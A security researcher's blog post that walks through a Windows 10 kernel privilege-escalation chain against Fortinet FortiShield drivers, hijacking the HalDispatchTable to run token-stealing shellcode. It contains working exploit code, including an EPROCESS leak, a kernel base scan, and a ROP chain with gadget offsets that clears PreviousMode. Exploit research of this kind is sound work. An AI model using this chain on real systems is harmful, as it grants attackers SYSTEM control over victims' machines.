Finding A Needle In A KSTACK

I ran into a bugcheck, AKA the Blue Screen Of Death (BSOD), on Windows 10 20H1 while solving an Extra Mile exercise in the EXP-401 course. The challenge was to change the course exploit targeting CVE-2021-1732 from a Data Only attack to Code Execution.

In a Data Only attack we use the read/write primitives of the exploit to find the SYSTEM process and copy its token to our current process, thus elevating our process to SYSTEM. This saves us from having to execute shellcode or dynamic code in the kernel, which would be stopped by Hypervisor-protected Code Integrity (HVCI). HVCI works sort of like Arbitrary Code Guard (ACG) in user-mode, but protects kernel-mode memory. The gist at a high level is that code is immutable, dynamic code is bad and should not run, and therefore HVCI makes it impossible to run dynamic code. You can read more about HVCI on the Microsoft site: HVCI. HVCI has to be turned off by removing the Hyper-V role and disabling Virtualization Based Security (VBS) in the VM to play around with the kernel-mode code execution challenge. A Windows 10 20H2 VM without HVCI/VBS is used in the demo for this blog.

The task seemed easy enough:

Allocate user-mode memory
Copy token stealing shellcode to the user-mode memory address that I control
Enumerate the Page Table Entry (PTE) for that user-mode memory address I control
Use the read and write primitives to change the User/Supervisor (U/S) bit to S AKA 0
Hijack execution through the HalDispatchTable by replacing HalDispatchTable+0x08 (HaliQuerySystemInformation) with the address of my shellcode
Trigger HalDispatchTable+0x08 from user-mode
Start a command prompt cmd.exe
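The U/S flip in the steps above comes down to a single bit in a 64-bit page table entry. The block below is a minimal sketch, assuming the architectural x64 PTE layout (bit 2 is User/Supervisor, bit 63 is NX). The helper names and the sample PTE value are made up for illustration and are not part of the exploit code.

```cpp
#include <cstdint>

// x64 PTE flag bits (architectural layout).
constexpr std::uint64_t PTE_PRESENT = 1ULL << 0;   // P
constexpr std::uint64_t PTE_WRITE   = 1ULL << 1;   // R/W
constexpr std::uint64_t PTE_USER    = 1ULL << 2;   // U/S: 1 = user, 0 = supervisor
constexpr std::uint64_t PTE_NX      = 1ULL << 63;  // NX: 1 = not executable

// Hypothetical helper: mark a page as supervisor (kernel) by clearing U/S.
constexpr std::uint64_t make_supervisor(std::uint64_t pte) {
    return pte & ~PTE_USER;
}

// Hypothetical helper: true when the entry describes a user-mode page.
constexpr bool is_user_page(std::uint64_t pte) {
    return (pte & PTE_USER) != 0;
}

// Made-up sample PTE: present, writable, user, executable (NX clear).
constexpr std::uint64_t sample_pte =
    0x0000000123456000ULL | PTE_PRESENT | PTE_WRITE | PTE_USER;

static_assert(is_user_page(sample_pte), "sample starts as a user page");
static_assert(make_supervisor(sample_pte) == 0x0000000123456003ULL,
              "only bit 2 changes");
```

In the real exploit the PTE value would be read and written back through the kernel read/write primitives rather than computed on a constant.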

In reality it was not that simple. I will walk through a similar scenario of solving the HalDispatchTable hijack in this blog with a little Reverse Engineering (RE) and a lot of kernel debugging. I will also switch from the TagWND exploit (CVE-2021-1732) to attacking CVE-2021-31955, CVE-2015-4077, and CVE-2015-5736 on Windows 10 20H2 to avoid spoiling the Extra Mile from EXP-401. This attacks the FortiShield driver and uses a native Windows information leak for a full chain. I built this exploit by combining two public POCs and modifying them for the OS version and to target code execution through the HalDispatchTable. There is also an Extra Mile in the 2025 version of the EXP-401 course to solve that same FortiShield exploit, but it is on a different version of the OS, so my hardcoded offsets won’t work and you will BSOD if you just try to run my code to solve that one. If you wish to follow along in your own lab you will need a Windows 10 20H2 VM with Fortinet FortiClient 5.2.3 installed. You will also need a VM for kernel debugging with WinDbg.

This blog is intended to be a deeper dive on the HalDispatchTable and issues caused by HVCI and will be lighter on the explanation of the CVEs.

CVE-2021-31955 is a native Windows kernel vulnerability that allows leaking the EPROCESS address of every process running on the system. The high-level overview is that poor access controls allowed a low integrity process to use the SUPERFETCH feature of the NtQuerySystemInformation API to query the EPROCESS address of each running process. Microsoft has patched this particular flaw and has implemented additional hardening in the NtQuerySystemInformation API to prevent leaking kernel-mode addresses at Medium and High integrity levels as well. In Windows 11 24H2 Microsoft implemented the ExIsRestrictedCaller check, which now checks whether the calling process has the SeDebugPrivilege before returning kernel-mode addresses. A process that does not have the SeDebugPrivilege will receive zeroed out or masked kernel-mode pointers and addresses (see KASLR-Leaks-Restriction). Kernel Page Table Isolation also prevents dereferencing kernel-mode memory from user-mode, so you need a kernel-mode read/write primitive for any leaked addresses to be useful.

freeide’s POC code for CVE-2021-31955 was used and slightly modified to work in this exploit. The main changes were adding a target process name parameter to the GetEprocessAddress() function, modifying the for loop to find the target process and only return its EPROCESS instead of printing all running processes, and returning the target process EPROCESS address as a ULONGLONG instead of returning void. A walkEprocess() function was also added to return the KTHREAD of the current thread given the EPROCESS. You will notice variations in naming conventions for functions and variables in this POC. This is because I’m lazy and felt it too tedious to modify the combined POCs into a single consistent naming convention. I’m ok with you judging me for that.

ULONGLONG GetEprocessAddress(const char* target)
....

	const char* targetName = target;
	const char* procName;

	for (ULONG i = 0; i < sv3plus_request->InfoCount; ++i)
	{
		procName = (const char*)&sv3plus_request->InfoArrayV3Plus[i].data[0x14];

		if (strcmp(procName, targetName) == 0) {
			//printf("%15s\t%5d\t%p\n", procName, sv3plus_request->InfoArrayV3Plus[i].ProcessId, sv3plus_request->InfoArrayV3Plus[i].EProcess);
			return sv3plus_request->InfoArrayV3Plus[i].EProcess;
		}

...
ULONGLONG walkEprocess(HANDLE driver, ULONGLONG eProcess) {
	DWORD currentTid = GetCurrentThreadId();

	ULONGLONG listHead = eProcess + EPROCESS_ThreadListHead_Offset;
	ULONGLONG flink = leakQWORD(listHead, driver);

	while (flink != listHead) {
		ULONGLONG ethread = flink - ETHREAD_ThreadListEntry_Offset;

		ULONGLONG uniqueTid = leakQWORD(ethread + ETHREAD_Cid_Offset + CLIENTID_UniqueThread_Offset, driver);

		if ((DWORD)uniqueTid == currentTid) {
			ULONGLONG kthread = ethread;  // Tcb is at offset 0x0
			printf("[+] Found current thread:\n");
			printf("[+] ETHREAD: 0x%llx\n", ethread);
			printf("[+] KTHREAD: 0x%llx\n", kthread);
			return kthread;
		}

		flink = leakQWORD(flink, driver);  // Move to next thread
	}

	printf("[-] Current thread not found in EPROCESS thread list.\n");
	return 0;  // every path must return a value; 0 signals "not found"
}
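The list walk in walkEprocess() can be tried out without a driver by swapping the read primitive for a lookup in simulated memory. This is a sketch under stated assumptions: FakeMemory, read_qword(), find_thread(), and build_demo_memory() are hypothetical names, the addresses and thread IDs are made up, and only the offsets (0x5e0, 0x4e8, 0x478, 0x8) come from the post.

```cpp
#include <cassert>
#include <cstdint>
#include <map>

using FakeMemory = std::map<std::uint64_t, std::uint64_t>;  // address -> QWORD

// Offsets taken from the post (Windows 10 20H1/20H2).
constexpr std::uint64_t kThreadListHead  = 0x5e0;  // EPROCESS.ThreadListHead
constexpr std::uint64_t kThreadListEntry = 0x4e8;  // ETHREAD.ThreadListEntry
constexpr std::uint64_t kCid             = 0x478;  // ETHREAD.Cid
constexpr std::uint64_t kUniqueThread    = 0x8;    // CLIENT_ID.UniqueThread

// Stand-in for leakQWORD(): reads simulated memory instead of the driver.
std::uint64_t read_qword(const FakeMemory& mem, std::uint64_t addr) {
    auto it = mem.find(addr);
    assert(it != mem.end() && "read of unmapped simulated address");
    return it->second;
}

// Walk the circular thread list; return the matching ETHREAD, or 0 if none.
std::uint64_t find_thread(const FakeMemory& mem, std::uint64_t eprocess,
                          std::uint32_t tid) {
    const std::uint64_t list_head = eprocess + kThreadListHead;
    std::uint64_t flink = read_qword(mem, list_head);
    while (flink != list_head) {
        // The LIST_ENTRY sits kThreadListEntry bytes into the ETHREAD.
        const std::uint64_t ethread = flink - kThreadListEntry;
        const std::uint64_t unique_tid =
            read_qword(mem, ethread + kCid + kUniqueThread);
        if (static_cast<std::uint32_t>(unique_tid) == tid) {
            return ethread;  // Tcb is at offset 0, so this is also the KTHREAD
        }
        flink = read_qword(mem, flink);  // follow Flink to the next entry
    }
    return 0;  // explicit "not found" value
}

// Build a made-up process with two threads (TIDs 0x111 and 0x222).
FakeMemory build_demo_memory(std::uint64_t eprocess, std::uint64_t t1,
                             std::uint64_t t2) {
    FakeMemory mem;
    const std::uint64_t head = eprocess + kThreadListHead;
    mem[head] = t1 + kThreadListEntry;                   // head -> thread 1
    mem[t1 + kThreadListEntry] = t2 + kThreadListEntry;  // thread 1 -> thread 2
    mem[t2 + kThreadListEntry] = head;                   // thread 2 -> head
    mem[t1 + kCid + kUniqueThread] = 0x111;
    mem[t2 + kCid + kUniqueThread] = 0x222;
    return mem;
}
```

Returning 0 for a missing thread gives the caller something to check before using the result as a kernel address.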

CVE-2015-4077 is a vulnerability in the mdare64_48.sys driver from Fortinet that allows reading arbitrary kernel memory. The POC sends the vulnerable Input/Output Control (IOCTL) code to read a specified kernel-mode memory address. This is what gives us the read primitive for our exploit.

Morten Schenk and Sickness’s POC code from exploit-db was used to exploit CVE-2015-4077 in this exploit. The leakNtBase() function required some updates to find the base address of nt. According to wumb0 the .text section of nt was moved from offset 0x1000 in the ntoskrnl.exe to an offset of around 0x2000000. This broke Morten Schenk’s scan back method for finding the MZ header to recover the base address. It is fixable by subtracting a large value first before performing the scan back.

ULONGLONG leakNtBase(HANDLE driver, ULONGLONG kthread)
{

	ULONGLONG ntAddr = leakQWORD(kthread + 0x2a8, driver);
	ULONGLONG baseAddr;
	ULONGLONG signature = 0x00905a4d;
	ULONGLONG searchAddr = (ntAddr-0x300000) & 0xFFFFFFFFFFFFF000;

	while (TRUE)
	{
		ULONGLONG readData = leakQWORD(searchAddr, driver);
		ULONGLONG tmp = readData & 0xFFFFFFFF;
		
		//printf("%llx\n", readData);
		//printf("%llx\n", tmp);
		

		if (tmp == signature)
		{
			baseAddr = searchAddr;
			break;
		}
		searchAddr = searchAddr - 0x1000;
	}
	return baseAddr;
}
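The scan back idea can be exercised against a simulated image instead of live kernel memory. The sketch below assumes a little-endian host and uses hypothetical names (FakeImage, find_image_base(), make_demo_image()) with a made-up base address. Unlike the loop above, it also bounds the number of pages scanned so a bad starting pointer cannot loop forever.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Simulated kernel image: a byte buffer that "lives" at a made-up address.
struct FakeImage {
    std::uint64_t base;
    std::vector<std::uint8_t> bytes;

    // Stand-in for leakQWORD(): read 8 bytes at a virtual address.
    std::uint64_t read_qword(std::uint64_t addr) const {
        assert(addr >= base && addr - base + 8 <= bytes.size());
        std::uint64_t value = 0;
        std::memcpy(&value, bytes.data() + (addr - base), sizeof(value));
        return value;
    }
};

// Jump back by `skip`, page-align, then scan backwards one page at a time
// for the DOS header bytes 4D 5A 90 00. Returns 0 if not found in the bound.
std::uint64_t find_image_base(const FakeImage& img, std::uint64_t leaked_ptr,
                              std::uint64_t skip, std::size_t max_pages) {
    const std::uint64_t signature = 0x00905a4d;
    std::uint64_t addr = (leaked_ptr - skip) & ~0xFFFULL;
    for (std::size_t i = 0; i < max_pages && addr >= img.base; ++i) {
        if ((img.read_qword(addr) & 0xFFFFFFFFULL) == signature) {
            return addr;
        }
        addr -= 0x1000;
    }
    return 0;
}

// Build a made-up 4 MiB image filled with 0xCC and an MZ header at offset 0.
FakeImage make_demo_image(std::uint64_t base) {
    FakeImage img{base, std::vector<std::uint8_t>(0x400000, std::uint8_t{0xCC})};
    const std::uint8_t mz[4] = {0x4d, 0x5a, 0x90, 0x00};
    std::memcpy(img.bytes.data(), mz, sizeof(mz));
    return img;
}
```

With a leaked pointer 0x3a1234 bytes into the demo image and a skip of 0x300000, the scan starts at offset 0xa1000 and walks back page by page until it reaches the header.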

CVE-2015-5736 is a vulnerability in the fortishield.sys driver from Fortinet that allows arbitrary code execution in the kernel by letting the user set the callback function from user-mode. We use this vulnerable IOCTL to set a callback to a ROP chain that will clear the PreviousMode bit on our KTHREAD, allowing us to create a kernel-mode write primitive. The easier version of this exploit would then allocate user-mode memory containing token stealing shellcode, flip the U/S bit on the PTE, and then use the vulnerable IOCTL again, setting the callback function to our user-mode address containing our shellcode. We are going a slightly harder route and using the write primitive to hijack execution through the HalDispatchTable, which gives us the chance to bypass another mitigation.

Morten Schenk and Sickness’s POC from exploit-db was also used to exploit CVE-2015-5736 in this exploit. The major changes were updating the ROP chain to work with Windows 10 20H2 and modifying it to use the HalDispatchTable for the shellcode execution instead of incorporating the shellcode execution into the ROP chain or calling the vulnerable IOCTL a second time to execute the shellcode.

PULONGLONG allocate_fake_stack(ULONGLONG ntBase, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG kThread)
{
	PULONGLONG fake_stack = (PULONGLONG)VirtualAlloc((LPVOID)0x00000000B60E0000, 0x14000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (fake_stack == NULL)
	{
		printf("[!] Error while allocating the fake stack: %d\n", GetLastError());
		exit(1);
	}
	memset(fake_stack, 0x90, 0x14000);

	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x00))[0] = (ULONGLONG)ntBase + 0x3f01bf;		// pop rax ; pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x08))[0] = (ULONGLONG)fortishield_callback;		// Callback address
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x10))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x18))[0] = (ULONGLONG)ntBase + 0x2dd014;		// mov qword [rax], rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x20))[0] = (ULONGLONG)ntBase + 0x3f01bf;		// pop rax ; pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x28))[0] = (ULONGLONG)kThread + 0x232;			// KTHREAD.PreviousMode
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x30))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x38))[0] = (ULONGLONG)ntBase + 0x49584f;		// mov byte [rax], cl ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x40))[0] = (ULONGLONG)ntBase + 0x2017d0;		// pop rbx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x48))[0] = 0x00000000b60f0110;					// Location on fake_stack
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x50))[0] = (ULONGLONG)ntBase + 0x2017f2;		// pop rax ; ret;
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x58))[0] = (ULONGLONG)ntBase + 0x217527;		// mov rax, rcx ; add rsp, 0x28 ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x60))[0] = (ULONGLONG)ntBase + 0x3cd671;		// mov rcx, rsi ; call rax
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x68))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x70))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x78))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x80))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x88))[0] = (ULONGLONG)ntBase + 0x20de71;		// pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x90))[0] = 0x0000000000000028;					// Value to subtract to get RSP
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x98))[0] = (ULONGLONG)ntBase + 0x029db2b;		// sub rax, rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xa0))[0] = (ULONGLONG)ntBase + 0x20de71;		// pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xa8))[0] = (ULONGLONG)fortishield_restore;		// Restore address
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xb0))[0] = (ULONGLONG)ntBase + 0x2dd014;		// mov qword [rax], rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xb8))[0] = (ULONGLONG)ntBase + 0x2b82ce;		// mov qword [rbx], rax ; add rsp, 0x20 ; pop rbx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xc0))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xc8))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xd0))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xd8))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xe0))[0] = 0x0000000000000000;					// Restore RBX
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xe8))[0] = (ULONGLONG)ntBase + 0x201380;		// pop rsp ; ret
	return fake_stack;
}
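The addresses in the listing above can be sanity checked with plain arithmetic. This sketch only uses constants that appear in the post (the 0xB60E0000 allocation, the 0x14000 size, the 0x10020 chain offset, and the 0xb60f0110 value loaded into rbx); the helper names are hypothetical.

```cpp
#include <cstdint>

constexpr std::uint64_t kFakeStackBase = 0x00000000B60E0000ULL;  // VirtualAlloc base
constexpr std::uint64_t kFakeStackSize = 0x14000;                // allocation size
constexpr std::uint64_t kChainOffset   = 0x10020;                // first gadget slot

// Address of the ROP-chain slot at a byte offset from the chain start.
constexpr std::uint64_t chain_slot(std::uint64_t slot_offset) {
    return kFakeStackBase + kChainOffset + slot_offset;
}

// True when addr falls inside the fake-stack allocation.
constexpr bool in_fake_stack(std::uint64_t addr) {
    return addr >= kFakeStackBase && addr < kFakeStackBase + kFakeStackSize;
}

static_assert(chain_slot(0x00) == 0xB60F0020ULL, "chain start");
static_assert(chain_slot(0xe8) == 0xB60F0108ULL, "last slot: pop rsp ; ret");
static_assert(chain_slot(0xf0) == 0xB60F0110ULL, "slot after the last gadget");
static_assert(in_fake_stack(chain_slot(0xf0)), "chain stays inside the allocation");
static_assert(chain_slot(0x00) <= 0xFFFFFFFFULL, "reachable with a 32-bit immediate");
```

The chain start, 0xB60F0020, fits in 32 bits, which is what lets a gadget that loads a 32-bit immediate into esp land on it. The 0xb60f0110 value placed in rbx is the slot immediately after the final pop rsp ; ret, which appears to be where the chain stores the stack pointer that gadget then restores.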

The full exploit code can be found in my GitHub repo forti_shield.

A quick side quest is necessary to discuss some important structures used by the Windows kernel. Processes are a management and control construct used by Windows to control resources and scheduling of code execution. Processes do not execute code themselves. Processes contain threads, and sometimes fibers, that execute the code. A running process has EPROCESS, KPROCESS, ETHREAD, and KTHREAD structures.

The EPROCESS structure is the virtual representation of the process in the Executive’s portion of the Windows kernel. This structure contains process identity and basic metadata including the UniqueProcessId (Process Identifier, PID), ImageFileName (name of the executable), and InheritedFromUniqueProcessId (parent PID). EPROCESS also contains the Flags field that lists the process state, protection flags, and job associations. It ties together the thread, memory management, and security information of the process. It contains the ActiveProcessLinks, which is a doubly linked list chaining all running processes together. This is an important piece to remember, as part of our Privilege Escalation is walking the ActiveProcessLinks to find the SYSTEM process (PID 4). The other important piece to remember for Privilege Escalation is that the EPROCESS also contains the Security Token. The Security Token is the identifier that ties the process to the privileges it has. So if we copy the SYSTEM process token over our current process’s Security Token in its EPROCESS structure, then our process will have the same privileges as the SYSTEM process. The integrity levels, or trust/permission levels, for a process are low (low privileged/sandboxed user), medium (normal user), high (administrator), and SYSTEM (Full Control). The EPROCESS also contains a pointer to the Process Environment Block (PEB), which contains the environment information for the process that is accessible from user-mode.

The KPROCESS structure is embedded in the EPROCESS structure. This structure is the virtual representation of the process object for the kernel. It holds the lower level details and management of the process including scheduling, dispatcher info, ready queues, affinity, and priority for the process. It is basically all of the scheduling information for the process to schedule the threads for execution. KPROCESS also tracks context switching between threads. We use this feature in kernel debugging when we switch to the context of our process and interact with the process’s Executive Thread.

The ETHREAD represents the thread for the Executive portion of the Windows kernel. It contains high level thread specific information such as ThreadListEntry (link back to the EPROCESS), ThreadPriority, and Client_id (Cid). The Cid is a structure containing the UniqueProcess Id (PID) and the UniqueThread Id (TID). This makes it possible to link the thread and process together when walking from the EPROCESS down to the KTHREAD, and to verify you have the right process/thread combination while walking the linked lists, as the walkEprocess function of the POC does. The ETHREAD has the KTHREAD embedded, making it possible to also walk back to the EPROCESS if you have the KTHREAD address, using the Cid and ThreadListEntry. It also contains a pointer to the Thread Environment Block (TEB), which contains the thread’s environment information that is accessible from user-mode. In user-mode, if you needed to find the stack limit and stack base for the thread, you would pull them from the TEB.

The KTHREAD is embedded in the ETHREAD. This is the representation of the thread in the kernel portion of the Windows kernel. It holds stack information, dispatcher state, wait blocks, and the TrapFrame. The TrapFrame references the CPU registers stored on the stack so they can be restored when the thread resumes execution. It is important to remember that while threads appear to us to run continuously, that is not the case in reality. Threads are only allowed to run for very brief intervals on the CPU and then go to a wait state until it’s their turn to run again. Thus the CPU register values need to be stored somewhere to restore the state and continue execution. The KTHREAD is also where we can find the PreviousMode bit. It used to be possible to create a read/write primitive by clearing the PreviousMode bit. Windows checks this bit to determine whether parameters passed to the Win32 APIs or native functions were sent from kernel-mode or user-mode. So if it was cleared to zero, you could call ReadProcessMemory and NtWriteVirtualMemory to read or write kernel-mode memory from user-mode, as the kernel would think the call came from kernel-mode instead of user-mode. This method is no longer possible on current versions of Windows, but it is the method used in this example.

post2-windbg-kthread

I started solving the kernel code execution piece by looking at examples of how other people have used the HalDispatchTable method (and also by ensuring HVCI and VBS were disabled on the VM). Connor McGarr wrote a nice blog on exploiting Hacksys Extreme Vulnerable Driver (HEVD) in 32-bit where he used it to call his shellcode stored in a user-mode memory location. If you can understand 32-bit, then you can typically pivot to 64-bit easily: Kernel-Exploitation-2 (Connor McGarr).

I will do the quick dive through the 64-bit version here.

If we open up ntoskrnl.exe in IDA and search for HalDispatchTable we will find one hit.

post2-ida-haldispatch-table1

Double click on it to see the table and look for HalDispatchTable+0x08.

post2-ida-haldispatch-table2

Here it is labeled as xHalSetSystemInformation, which is weird because we know at run time it is set to nt!HaliQuerySystemInformation. This is because the HalDispatchTable is built at runtime when the OS boots. xHalSetSystemInformation is an internal wrapper/thunk function that sits between ntoskrnl and the Hardware Abstraction Layer (HAL) implementation. The symbol name seen at runtime varies based on factors such as ACPI HAL vs APIC HAL, Hypervisor presence, secure kernel state, and build version. It will stay consistent across boots of your lab VM though. We can verify the symbol name at runtime in WinDbg with:

 dqs nt!HalDispatchTable

post2-windbg-haldispatchtable-1

Our goal is to figure out how to reach this entry in the dispatch table. If we cross reference the label off__140C00A68 in IDA by highlighting it and hitting ctrl+J, or by right clicking and selecting ‘list cross references to’, we will see KeQueryIntervalProfile in the list. Ke and Ki designate kernel functions in Microsoft’s naming conventions. We will investigate this function, as a kernel function looks like an interesting candidate. If this was brand new to us and we were trying to find the unknown path, we would likely have to investigate many of the options until we found something that works.

post2-ida-kequeryintervalprofile-1

When we double click the entry for KeQueryIntervalProfile we will jump to the function in IDA. It’s important to note here that we see a call to guard_dispatch_icall which is a Kernel Control Flow Guard (KCFG) function.

post2-ida-kequeryintervalprofile-2

Now if we right click KeQueryIntervalProfile at the top of the graph and select “List cross reference to…” or hit ctrl+X we can see a reference in NtQueryIntervalProfile.

post2-ida-kequeryintervalprofile-3

As we double click and enter the NtQueryIntervalProfile function, we see in the function’s prologue a “mov rax, gs:188h” followed by “mov dil, [rax+232h]” and “test dil, dil”. This loads the KTHREAD of the calling thread into rax, then extracts the PreviousMode and checks whether it is 0, meaning kernel-mode. The PreviousMode tells the kernel whether the thread is calling from kernel-mode or user-mode. This indicates that the function is most likely called via a syscall, since it checks where the call originated after the context has been switched to kernel-mode, and it mirrors the typical prologue of a function called via a syscall.

post2-windbg-previousmode-1

post2-windbg-previousmode-2

We will now jump over to ntdll.dll for further analysis. When we open up ntdll.dll in IDA and check the exports we find an NtQueryIntervalProfile function within ntdll as well.

post2-ida-ntqueryintervalprofile-2

When we double click on the function to jump to the disassembly graph we see a short function that makes a 0x151 syscall.

post2-ida-ntqueryintervalprofile-3

We can then switch back to WinDbg and verify that syscall 0x151 resolves to nt!NtQueryIntervalProfile. We consult the KiServiceTable, which is a table of offsets to the system service routines in ntoskrnl; the syscall number is the index into the KiServiceTable. Each entry is 4 bytes, so we read the entry at nt!KiServiceTable + 4 * 0x151, right shift the value by 4 bits, add the result to nt!KiServiceTable, and disassemble at that address. We use the following commands to verify the syscall:

dd nt!KiServiceTable + 0x04 * 0x151 L1

? 064FCD00 >>> 4

u nt!KiServiceTable + 00000000`0064fcd0

post2-windbg-syscall-1
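The same decoding can be written out as code. This is a minimal sketch of the arithmetic behind the WinDbg commands above, assuming the x64 entry layout where the low 4 bits hold the number of stack-passed arguments and the upper 28 bits hold a signed offset from the table base. The function names and the table base in the usage note are made up; only the entry value 0x064FCD00 comes from the post.

```cpp
#include <cstdint>

// Offset of the service routine relative to nt!KiServiceTable.
// The shift on a signed value is arithmetic, like WinDbg's >>> operator
// (guaranteed since C++20, and what mainstream compilers do anyway).
constexpr std::int64_t service_offset(std::int32_t entry) {
    return entry >> 4;
}

// Low nibble: number of arguments passed on the stack.
constexpr std::uint32_t stack_arg_count(std::int32_t entry) {
    return static_cast<std::uint32_t>(entry & 0xF);
}

// Final address: table base plus the decoded offset.
constexpr std::uint64_t service_address(std::uint64_t table_base,
                                        std::int32_t entry) {
    return table_base + static_cast<std::uint64_t>(service_offset(entry));
}

// Address of the 4-byte entry for a syscall number.
constexpr std::uint64_t entry_address(std::uint64_t table_base,
                                      std::uint32_t syscall_number) {
    return table_base + 4ULL * syscall_number;
}

static_assert(service_offset(0x064FCD00) == 0x64fcd0, "matches ? 064FCD00 >>> 4");
static_assert(stack_arg_count(0x064FCD00) == 0, "both arguments fit in registers");
```

For example, with a made-up table base of 0xfffff80010000000, entry_address(base, 0x151) is base + 0x544 and service_address(base, 0x064FCD00) is base + 0x64fcd0.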

We can call this function from user-mode since it is exported from ntdll.dll, as long as we know the function prototype and its parameters. However, this is an undocumented API and Microsoft does not intend for us to call it directly, meaning they do not provide us with the function prototype or an example of how to call it. Luckily, other researchers have performed the RE necessary to determine the function prototype so that we know how to call it. NtDoc lists the prototype as:

#ifndef _NTEXAPI_H
#if (PHNT_MODE != PHNT_MODE_KERNEL)

/**
 * The NtQueryIntervalProfile routine retrieves the interval for the specified profile source.
 *
 * \param ProfileSource The profile source (KPROFILE_SOURCE) to query.
 * \param Interval A pointer to a variable that receives the interval, in 100-nanosecond units.
 * \return NTSTATUS Successful or errant status.
 */
NTSYSCALLAPI
NTSTATUS
NTAPI
NtQueryIntervalProfile(
    _In_ KPROFILE_SOURCE ProfileSource,
    _Out_ PULONG Interval
    );

#endif
#endif

Connor McGarr was able to use 0x1234 for ProfileSource in his blog. I did not have any luck getting that to work in my initial testing. This was likely due to other errors in the code, because it now works if I use that value in my final POC. I used the value 0x2, which corresponds to ProfileTotalIssues, during my troubleshooting when I finally got the code to work. I picked this value based on a recommendation from Microsoft Copilot when troubleshooting errors, as it said it was the most commonly used value. AI can help you if used properly, but you cannot be successful in the security research or exploit development fields if you over-rely on AI. My testing showed that the value 0x2 worked, so I kept it, as legitimate values blend in a bit better than random values that do not conform to what a normal call looks like. The Interval parameter can simply be a pointer to a declared ULONG variable. Below is the KPROFILE_SOURCE enum from NtDoc:

#ifndef _NTKEAPI_H
#if (PHNT_MODE != PHNT_MODE_KERNEL)

typedef enum _KPROFILE_SOURCE
{
    ProfileTime,
    ProfileAlignmentFixup,
    ProfileTotalIssues,
    ProfilePipelineDry,
    ProfileLoadInstructions,
    ProfilePipelineFrozen,
    ProfileBranchInstructions,
    ProfileTotalNonissues,
    ProfileDcacheMisses,
    ProfileIcacheMisses,
    ProfileCacheMisses,
    ProfileBranchMispredictions,
    ProfileStoreInstructions,
    ProfileFpInstructions,
    ProfileIntegerInstructions,
    Profile2Issue,
    Profile3Issue,
    Profile4Issue,
    ProfileSpecialInstructions,
    ProfileTotalCycles,
    ProfileIcacheIssues,
    ProfileDcacheAccesses,
    ProfileMemoryBarrierCycles,
    ProfileLoadLinkedIssues,
    ProfileMaximum
} KPROFILE_SOURCE;

#endif
#endif
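Because the enumerators have no explicit values, they count up from 0, which is why 0x2 maps to ProfileTotalIssues. The sketch below restates just the first few enumerators under a hypothetical name (KPROFILE_SOURCE_DEMO) so it compiles on its own, and adds a made-up helper showing that 0x1234 falls outside the listed range.

```cpp
#include <cstdint>

// First few enumerators only, in the same order as the NtDoc listing.
enum KPROFILE_SOURCE_DEMO : std::uint32_t {
    ProfileTime,            // 0
    ProfileAlignmentFixup,  // 1
    ProfileTotalIssues,     // 2
    ProfilePipelineDry      // 3
};

// ProfileMaximum is the 25th enumerator in the full listing, so it equals 24.
constexpr std::uint32_t kProfileMaximum = 24;

// Hypothetical helper: is a raw value one of the listed profile sources?
constexpr bool is_listed_profile_source(std::uint32_t value) {
    return value < kProfileMaximum;
}

static_assert(ProfileTotalIssues == 0x2, "the value used in the POC");
static_assert(is_listed_profile_source(0x2), "0x2 is a listed source");
static_assert(!is_listed_profile_source(0x1234), "0x1234 is not a listed source");
```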

We now have enough to start putting together a full chain exploit using the HalDispatchTable for kernel-mode code execution. The code for the executable that will result in a bugcheck is in the GitHub repo as bugcheck.cpp and listed below in chunks with explanations. You will still need the solution from the repo that includes the headers and libraries needed to compile.

This first chunk includes the headers, defines some constants, and declares TokenStealing(), the token stealing shellcode imported from token_stealing.asm. The constants are offsets in the EPROCESS and ETHREAD structures used to find the KTHREAD from the EPROCESS. These are hardcoded, so they are not guaranteed to work on other versions of Windows since they can change. They have been tested to work on Windows 10 20H1 and 20H2. We also define the prototype for NtQueryIntervalProfile at the end of this chunk.

#include "stdafx.h"
#include <windows.h>
#include "ntos.h"
#include <stdio.h>
#include <stdlib.h>
#include <Psapi.h>
#include <Shlobj.h>

#pragma comment (lib,"psapi")
